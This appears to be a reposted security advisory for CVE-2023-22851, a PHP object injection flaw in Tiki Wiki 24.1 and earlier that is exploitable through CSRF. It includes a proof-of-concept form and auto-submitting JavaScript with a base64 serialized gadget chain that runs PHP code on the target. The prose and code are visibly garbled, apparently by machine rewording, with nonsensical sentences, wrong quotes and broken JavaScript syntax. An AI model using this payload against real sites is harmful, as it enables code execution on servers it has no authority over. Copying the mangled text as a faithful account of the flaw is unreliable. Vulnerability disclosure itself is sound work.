![Authentication Flood | Wireless Network Attacks [FREE COURSE CONTENT]](https://www.ineedhack.com/wp-content/uploads/2023/01/Course-content-16-360x180.png)
—————————————————————————————————-
Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP
Object Injection Vulnerability
—————————————————————————————————-
Software Link [-]
https://tiki.org
[-] Versions Affected:
Version 24.1 or earlier versions.
[-] Vulnerability Description
This vulnerability can be found in
/lib/importer/tikiimporter_blog_wordpress.php script. Particularly,
Tiki Importer allows you to import data from WordPress websites.
Input passed through an XML file uploaded is being used to make a call
The PHP function unserialize() Malicious users can exploit this vulnerability.
Allows you to insert arbitrary PHP objects in the scope of your application.
They can execute arbitrary PHP commands, among other attacks.
code. This vulnerability can only be exploited by an administrator.
account (specifically, the ‘tiki_p_admin_importer’ permission). However,
This is due to KIS-2023-01’s CSRF vulnerability
Another way to exploit vulnerability is by tricking the victim into believing that you are a hacker
This is how to open a website:
<form action="http://localhost/tiki/tiki-importer.php" method="POST"
enctype=”multipart/form-data”>
<input type="hidden" name="importerClassName"
value=”TikiImporter_Blog_Wordpress” />
Const xmlContent =
atob(“PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAw
ZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg==”);
const fileInput = document.getElementById(“fileinput”);
const dataTransfer = new DataTransfer();
Const file = new File ([xmlContent], test.xml), type: ‘text/xml “);}
dataTransfer.items.add(file);
fileInput.files = dataTransfer.files;
document.forms[0].submit();
[-] Solution:
Upgrade to Version 24.2 or Later.
Disclosure Timeline
[07/03/2022] – Vendor notified
Released Version 24.1 [23/08/2022]
[09/01/2023] Public Disclosure
[-] CVE Refer:
Common Vulnerabilities and Exposures Project (cve.mitre.org).
This vulnerability has been given the CVE-2023-22851 name.
[-] Credits:
Egidio Romano discovered vulnerability.
[-] Original Advice:
http://karmainsecurity.com/KIS-2023-04
